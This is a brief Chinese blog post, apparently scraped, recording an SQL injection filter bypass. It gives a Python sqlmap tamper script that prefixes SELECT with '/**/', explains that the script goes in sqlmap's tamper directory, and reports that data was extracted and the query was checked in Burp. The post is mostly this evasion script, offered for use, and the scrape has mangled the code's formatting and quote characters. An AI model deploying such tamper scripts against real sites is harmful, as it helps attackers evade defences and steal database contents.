记录一次sql注入绕过
时间:2021-07-01 10:21:17
帮助过:25人阅读
!/usr/bin/env python
def tamper(payload, **
kwargs):
retVal =
payload
if ‘SELECT‘ in retVal:
retVal = retVal.replace(
‘SELECT‘,
‘/**/SELECT‘)
return retVal
命名为 select2select 放在sqlmap tamper 目录下面
![技术分享](https://img.gxlcms.com//Uploads-s/new/2020-10-12-qlqqti/20180111000926783806.png)
成功注入出数据
去burp 查看语句
![技术分享](https://img.gxlcms.com//Uploads-s/new/2020-10-12-qlqqti/20180111000926795525.png)
记录一次sql注入绕过
标签:select like xxx load net 数据 alt and png